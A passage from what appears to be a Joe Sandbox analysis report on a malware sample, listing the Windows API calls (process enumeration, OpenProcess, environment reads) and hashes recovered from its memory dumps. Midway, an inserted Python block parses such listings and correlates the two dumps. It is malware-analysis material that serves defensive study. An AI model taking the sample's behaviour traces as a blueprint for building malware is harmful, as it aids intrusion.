                                                  • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e2c0e9d55fcd13551ec2678028d06ddb1c515a5452d77a18986bab3fa9fe77ab
                                                  • Instruction ID: 93be63204a45b977d8dc8ffeacd8501e610d2eaef30f09056aa47a9d88cdab11
                                                  • Opcode Fuzzy Hash: e2c0e9d55fcd13551ec2678028d06ddb1c515a5452d77a18986bab3fa9fe77ab
                                                  • Instruction Fuzzy Hash: 8871A472985216DFDB22CF58C884ABFBBFBEF49364F144229E85167190D770D941CBA0
                                                  APIs
                                                    • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                  • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                  • RtlAllocateHeap.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                  • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$Heap$AllocateInfoNativeProcessSystem
                                                  • String ID:
                                                  • API String ID: 4001361727-0
                                                  • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                  • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                  • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                  • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3033488037-0
                                                  • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                  • Instruction ID: 2e6d0f4258cd6385e5cb4e2ce218f67d39edb0e939d775f9ba110e64380e9ea7
                                                  • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                  • Instruction Fuzzy Hash: 6751D171A80208AFDB22DF69E841B6A77F6FF48724F140569E809E7250E732E905CB80
                                                  APIs
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 021382E0
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 02138358
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 02138385
                                                  • _free.LIBCMT ref: 021382CE
                                                    • Part of subcall function 02136D2C: HeapFree.KERNEL32(00000000,00000000,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?), ref: 02136D42
                                                    • Part of subcall function 02136D2C: GetLastError.KERNEL32(?,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?,?), ref: 02136D54
                                                  • _free.LIBCMT ref: 0213849A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                  • String ID:
                                                  • API String ID: 1286116820-0
                                                  • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                  • Instruction ID: 22607af0df60f3cc70266885c28db723fb4937eb5f9938dcc17b14f9cb21cc32
                                                  • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                  • Instruction Fuzzy Hash: 9F511971940219EFDB25EF79DC809AEB7BEEF40360B11067AF458932A0E730D945CB54
                                                  APIs
                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                    • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                    • Part of subcall function 0041B187: IsWow64Process.KERNEL32(00000000,?,?,?,00474358), ref: 0041B1A7
                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                    • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 2180151492-0
                                                  • Opcode ID: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                  • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                  • Opcode Fuzzy Hash: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                  • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                  • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                  • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                  • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                  • Instruction ID: d97d99adbf00298393b140ebf0630ac6e66dd793c7b9f750bef6ed85d79279c8
                                                  • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                  • Instruction Fuzzy Hash: 9541D332A40214EFDB25DF78C880A5EB7B7EF84724B1585A9E525EB391DB31E901CB84
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
                                                  • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
                                                  • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
                                                  • __freea.LIBCMT ref: 0044FFC4
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 313313983-0
                                                  • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                  • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                  • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                  • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                  • _free.LIBCMT ref: 0044E1A0
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                  • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                  • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                  • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0213E3AB
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0213E3CE
                                                    • Part of subcall function 02136D66: RtlAllocateHeap.NTDLL(00000000,0212468A,?), ref: 02136D98
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0213E3F4
                                                  • _free.LIBCMT ref: 0213E407
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0213E416
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                  • String ID:
                                                  • API String ID: 336800556-0
                                                  • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                  • Instruction ID: 06ce5d8ca48dcc326c959d3c111b98604d5acdbdc88129d70fe7ad132cb72bb1
                                                  • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                  • Instruction Fuzzy Hash: 880178A2645B557F27221ABA6C8CC7BAE6FDECAEB53150139FD04D2201EB61CC02C5B5
                                                  APIs
                                                  • GetLastError.KERNEL32(?,00000000,00000000,0043A7C2,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F48
                                                  • _free.LIBCMT ref: 00446F7D
                                                  • _free.LIBCMT ref: 00446FA4
                                                  • SetLastError.KERNEL32(00000000), ref: 00446FB1
                                                  • SetLastError.KERNEL32(00000000), ref: 00446FBA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                  • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                  • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                  • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                  APIs
                                                  • GetLastError.KERNEL32(?,00000000,00000000,0212AA29,00000000,?,?,0212AAAD,00000000,00000000,00000000,00000000,00000000,00000000,020F2E6F,?), ref: 021371AF
                                                  • _free.LIBCMT ref: 021371E4
                                                  • _free.LIBCMT ref: 0213720B
                                                  • SetLastError.KERNEL32(00000000), ref: 02137218
                                                  • SetLastError.KERNEL32(00000000), ref: 02137221
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                  • Instruction ID: b59c13f75b778b4de292d9b2ae89cd1a27f3c41a264d26bc9dc0106cb764da03
                                                  • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                  • Instruction Fuzzy Hash: E101D1B61C47017BC61326356C44A2F6A6FEBC1771B250139F828A22D1EF22C8038528
                                                  APIs
                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                  • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpen$FileImageName
                                                  • String ID:
                                                  • API String ID: 2951400881-0
                                                  • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                  • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                  • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                  • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                  APIs
                                                  • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0210B5FC
                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0210B60F
                                                  • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0210B62F
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0210B63A
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0210B642
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpen$FileImageName
                                                  • String ID:
                                                  • API String ID: 2951400881-0
                                                  • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                  • Instruction ID: 761aa78c3cf20443ba2a7edd46ae7e8396d0b16919a9e3992449ab0e9003b300
                                                  • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                  • Instruction Fuzzy Hash: C3F07D712883056BD71067D4AC99F7BB26CDB44796F010075F612D21E1EFF0CE814AA5
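The OpenProcess / GetProcessImageFileNameW routine above is listed twice with the same Opcode ID, once in the mapped image at 0x400000 ("based on PE: true") and once in the 0x20F0000 region ("based on PE: false"), and every call-site address in the second copy is offset from the first by the same constant. The Python below is an added example and is not part of the Joe Sandbox report or its tooling: it parses listings of the shape shown on this page, pairs functions across the two dumps by Opcode ID, checks that the per-call address delta really is constant before treating the second block as a relocated copy, and names the OpenProcess access-mask bits (0x1000 is PROCESS_QUERY_LIMITED_INFORMATION and 0x400 is PROCESS_QUERY_INFORMATION in the Windows SDK). It assumes only the field shapes visible here; the sample text embedded in the block is copied from this page.

```python
"""Added example (not from the Joe Sandbox report): correlate per-function API
listings across two memory dumps and decode OpenProcess access masks.

Assumption: input lines look like the 'APIs' / 'Memory Dump Source' /
'Opcode ID' fields on this page. Constant names are from the Windows SDK."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: three listings copied from this page. The first two share an
# Opcode ID (image copy at 0x400000, second copy in the 0x20F0000 region); the third
# shows a call without arguments and a subcall line that must be ignored.
SAMPLE = """\
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
• GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3C8
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
Memory Dump Source
• Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0210B5FC
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0210B60F
• GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0210B62F
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0210B63A
Memory Dump Source
• Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
• Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044E144
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?), ref: 00446B31
• _free.LIBCMT ref: 0044E1A0
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
Memory Dump Source
• Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
"""

CALL_RE = re.compile(r"^•\s*(?P<api>\w+)\.(?P<mod>\w+)"      # OpenProcess.KERNEL32
                     r"(?:\((?P<args>[^)]*)\),)?\s*ref:\s*"  # optional (arg,arg,...),
                     r"(?P<ref>[0-9A-Fa-f]{8})$")
SRC_RE = re.compile(r"Offset:\s*(?P<base>[0-9A-Fa-f]{8}),\s*based on PE:\s*(?P<pe>true|false)")
OPC_RE = re.compile(r"Opcode ID:\s*(?P<id>[0-9a-f]{64})")

@dataclass
class Call:
    api: str
    module: str
    args: list   # raw report tokens: 8-hex-digit values or '?' for unknown
    ref: int     # call-site address

@dataclass
class Func:
    calls: list = field(default_factory=list)
    dump_base: int = 0
    based_on_pe: bool = False
    opcode_id: str = ""

def parse_report(text):
    """One Func per 'APIs' block; 'Part of subcall' lines belong to callees and are skipped."""
    funcs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = Func()
            funcs.append(cur)
            continue
        if cur is None or "Part of subcall function" in line:
            continue
        if m := CALL_RE.match(line):
            args = m["args"].split(",") if m["args"] else []
            cur.calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16)))
        elif m := SRC_RE.search(line):
            cur.dump_base, cur.based_on_pe = int(m["base"], 16), m["pe"] == "true"
        elif m := OPC_RE.search(line):
            cur.opcode_id = m["id"]
    return funcs

# Windows SDK process access rights (single bits, so summing the keys equals OR-ing them).
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0008: "PROCESS_VM_OPERATION",
                  0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
                  0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
KNOWN_BITS = sum(PROCESS_ACCESS)

def decode_process_access(token):
    """Name the bits in an OpenProcess dwDesiredAccess token; unknown bits stay as hex."""
    if token == "?":
        return ["<unknown>"]
    mask = int(token, 16)
    names = [name for bit, name in PROCESS_ACCESS.items() if mask & bit]
    if mask & ~KNOWN_BITS:
        names.append(f"0x{mask & ~KNOWN_BITS:X}")
    return names

def group_by_opcode(funcs):
    """Identical Opcode IDs mean the same code seen in different dumps."""
    groups = defaultdict(list)
    for f in funcs:
        if f.opcode_id:
            groups[f.opcode_id].append(f)
    return groups

def relocation_delta(a, b):
    """Constant call-site delta between two copies of one function, or None when the
    call counts or per-call deltas disagree (then it is not a plain relocated copy)."""
    if len(a.calls) != len(b.calls):
        return None
    deltas = {cb.ref - ca.ref for ca, cb in zip(a.calls, b.calls)}
    return deltas.pop() if len(deltas) == 1 else None

def implied_image_base(pe_func, other):
    """Where the PE-backed copy's image base lands inside the other dump, if relocated."""
    delta = relocation_delta(pe_func, other)
    return None if delta is None else pe_func.dump_base + delta

if __name__ == "__main__":
    for opcode, copies in group_by_opcode(parse_report(SAMPLE)).items():
        print(opcode[:16], [hex(c.dump_base) for c in copies])
        if len(copies) == 2:
            print("  delta:", hex(relocation_delta(*copies)), "implied base:", hex(implied_image_base(*copies)))
        for c in copies[0].calls:
            if c.api == "OpenProcess":
                print("  OpenProcess access:", decode_process_access(c.args[0]))
```

Run as a script it prints the shared Opcode ID, the delta 0x1CF0267 and the implied base 0x20F0267 for the two OpenProcess copies, plus the named access bits. A None delta is the result to watch for: it means the two blocks with matching fuzzy hashes are not a straight relocated copy and should be compared by hand before being deduplicated.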
                                                  APIs
                                                  • _free.LIBCMT ref: 0044F7B5
                                                    • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                  • _free.LIBCMT ref: 0044F7C7
                                                  • _free.LIBCMT ref: 0044F7D9
                                                  • _free.LIBCMT ref: 0044F7EB
                                                  • _free.LIBCMT ref: 0044F7FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                  • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                  • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                  • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                  APIs
                                                  • _free.LIBCMT ref: 0213FA1C
                                                    • Part of subcall function 02136D2C: HeapFree.KERNEL32(00000000,00000000,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?), ref: 02136D42
                                                    • Part of subcall function 02136D2C: GetLastError.KERNEL32(?,?,0213FCB7,?,00000000,?,00000000,?,0213FF5B,?,00000007,?,?,0214046C,?,?), ref: 02136D54
                                                  • _free.LIBCMT ref: 0213FA2E
                                                  • _free.LIBCMT ref: 0213FA40
                                                  • _free.LIBCMT ref: 0213FA52
                                                  • _free.LIBCMT ref: 0213FA64
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
